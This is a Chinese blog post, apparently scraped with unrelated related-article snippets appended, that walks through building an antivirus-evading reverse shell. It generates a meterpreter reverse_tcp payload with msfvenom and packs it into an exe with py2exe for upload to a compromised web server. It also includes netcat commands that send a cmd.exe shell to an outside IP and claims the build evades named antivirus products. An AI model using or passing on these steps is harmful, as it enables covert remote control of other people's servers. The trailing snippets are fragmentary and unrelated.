分享一个免杀的反弹shell工具(python脚本转换成exe)

有时候网站服务器上有杀毒软件,我们上传的nc.exe、lcx.exe等工具都被杀了,这时候就需要一款免杀的工具来反弹shell。

这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可免杀。

参考链接:https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

第1步:安装Python2.7和Py2exe

一定要安装32位的Python 2.7和32位的Py2exe,不管你的操作系统是多少位的都要安装32位版本。

第2步:生成Python脚本

利用msfvenom生成Python脚本:

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.34.2 lport=443 -f raw -o /tmp/mrtp.py

第3步:创建setup.py

from distutils.core import setup
import py2exe
setup(
name = ‘Meter‘,
description = ‘Python-based App‘,
version = ‘1.0‘,
console=[‘mrtp.py‘],
options = {‘py2exe‘: {‘bundle_files‘: 1,‘packages‘:‘ctypes‘,‘includes‘: ‘base64,sys,socket,struct,time,code,platform,getpass,shutil‘,}},
zipfile = None,
)

第4步:生成exe

将之前生成的mrtp.py和setup.py放在同一个目录,然后执行命令:

python setup.py py2exe

稍等几秒钟即可转换成功,生成的exe程序保存dist目录。

第5步:反弹shell

首先使用MSF监听端口等待回连,然后将生成的exe程序上传的网站服务器并运行该程序即可反弹shell。

原文地址:https://www.cnblogs.com/dgjnszf/p/11191323.html

时间: 2024-11-10 00:13:11

分享一个免杀的反弹shell工具(python脚本转换成exe)的相关文章

分享一个免杀的netcat.exe

GitHub链接:https://github.com/7hmA3s/netcat 免杀情况: 360杀毒/5.0.0.8160   -- 静态扫描和动态执行均免杀 赛门铁克/14.0.3752   -- 静态扫描和动态执行均免杀 反弹shell步骤: 第1步: 外网服务器执行: netcat -l -p 443 第2步: 内网服务器执行: netcat.exe -t -e cmd.exe 136.79.5.226 443 原文地址:https://www.cnblogs.com/dgjnszf

shell vs python脚本监控http请求

各写一个shell和python脚本来监控http请求,并在服务不可用的时候重启服务. 监控的连接为: http://192.168.1.101:5022/product http://192.168.1.101:5024/module shell脚本如下,配合crontab计划任务每一分钟执行一次检查: #!/bin/bash # This shell is used to moniter 192.168.1.101 port 5022 & 5024 date  #在crontab里用来记录l

shell调用python脚本,并且向python脚本传递参数

1.shell调用python脚本,并且向python脚本传递参数: shell中: python test.py $para1 $para2 python中: import sys def main($canshu1, $canshu2) ..... main(sys.argv[1], sys.argv[2]) 2.使用shell调用python中的函数: python脚本如下: test.py: import ConfigParser config = ConfigParser.Config

一个简单的监控redis性能的python脚本

一个简单的监控redis性能的python脚本 上一篇已经讲了如何监控memcached了,现在也顺带讲如何监控redis. 首先介绍下监控redis那些信息: Redis ping:检验ping Redis alive:查看检查端口是否alive Redis connections:查看连接数 Redis blockedClients:正在等待阻塞客户端数量 Redis connectionsUsage:redis的连接使用率 Redis memoryUsage:redis内存使用量 Redi

如何用不同的工具将图片转换成PDF文件

将一些图片制作成一个文档这种操作经常会遇到,有时候为了保持图片的清晰度,会选择将图片都转换成一个pdf文件,在没有pdf编辑器情况下图片如何转换成pdf文件呢? 首先我们需要整理好要转换的图片,然后打开pdf转换工具,选择图片转PDF. 然后是把整理好的图片按编号有序的添加到转换列表,基本上大部分的格式的图片都可以进行添加.添加玩图片后,查看下方选项设置是否是将这些图片合并成一个PDF文件. 最后设置好输出目录,点开始转换后,等文件转换完成,就可以在输出目录中生成一个PDF文件了. 这种方法是将

ASP.NET:分享一个操作SQL Server数据库的工具类

1 using System; 2 using System.Collections.Generic; 3 using System.Linq; 4 using System.Web; 5 using System.Collections; 6 using System.Data.SqlClient; 7 8 public class DatabaseHelper 9 { 10 private string connectionString = Constants.ConnectionURL;

一个用于将sql脚本转换成实体类的js代码

以前写过一段C#,苦于编译才能用.这样的小工具最好是用脚本语言来编写,易于执行,也易于修改. js 代码 convert.js -------------------------------------------------- String.prototype.trim=function(){ return this.replace(/(^\s*)|(\s*$)/g, ""); } String.prototype.ltrim=function(){ return this.repl

输入一个表示整数的字符串,把该字符串转换成整数并输出。例如输入字符串"345",则输出整数345。

方法一:使用C函数库中的函数atoi(const char *nptr),一行代码就可以解决问题,但这并不是题目所需要的解题思路: 方法二:假如我们输入的是“345”,从左到右依次遍历,第一次所要的结果是“3”,第二次所要的结果是“34”,34=3*10+4,第三次所要的结果是“345”,345=34*10+5.由此,我们可以从左到右依次遍历每一个字符,将前一次得到的结果*10+本次遍历的字符,使用一个循环就可以将一个字符串转化成一个整数. 如果字符串中的第一个字符是“-”,那么得到的是负整数.

shell、python脚本终端颜色输出

 1 格式:  \033[显示方式;前景色;背景色m   2     3 说明:   4 前景色            背景色           颜色   5 ---------------------------------------   6 30                40              黑色   7 31                41              红色   8 32                42              绿色   9 33